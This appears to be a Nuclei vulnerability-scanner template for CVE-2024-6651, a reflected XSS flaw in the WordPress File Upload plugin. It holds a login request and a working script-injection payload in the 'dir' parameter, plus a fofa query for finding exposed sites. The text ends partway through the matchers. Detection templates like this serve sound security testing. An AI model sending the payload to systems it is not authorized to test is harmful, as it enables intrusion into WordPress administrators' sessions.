id: CVE-2024-6651 info: name: WordPress File Upload Plugin < 4.24.8 - Cross-Site Scripting author: ritikchaddha severity: high description: | The WordPress File Upload plugin before version 4.24.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'dir' parameter in the file browser page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context. impact: | Attackers can execute arbitrary JavaScript in administrator browsers by crafting malicious URLs with XSS payloads in the dir parameter. remediation: | Update WordPress File Upload plugin to version 4.24.8 or later to address the reflected XSS vulnerability. reference: - https://wpscan.com/vulnerability/65e2c77d-09bd-4a44-81d9-d7a5db0e0f84 - https://nvd.nist.gov/vuln/detail/CVE-2024-6651 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N cvss-score: 7.1 cve-id: CVE-2024-6651 cwe-id: CWE-79 epss-score: 0.15434 epss-percentile: 0.96371 metadata: max-request: 3 vendor: WordPress product: wp-file-upload fofa-query: body='wp-content/plugins/wp-file-upload/' tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wp-file-upload,authenticated,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} redirects: true matchers: - type: word part: body words: - 'wp-file-upload/' internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/options-general.php?page=wordpress_file_upload&action=file_browser&dir=7b2BEyT8ArR1jaD9%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctest%20test%3D HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '">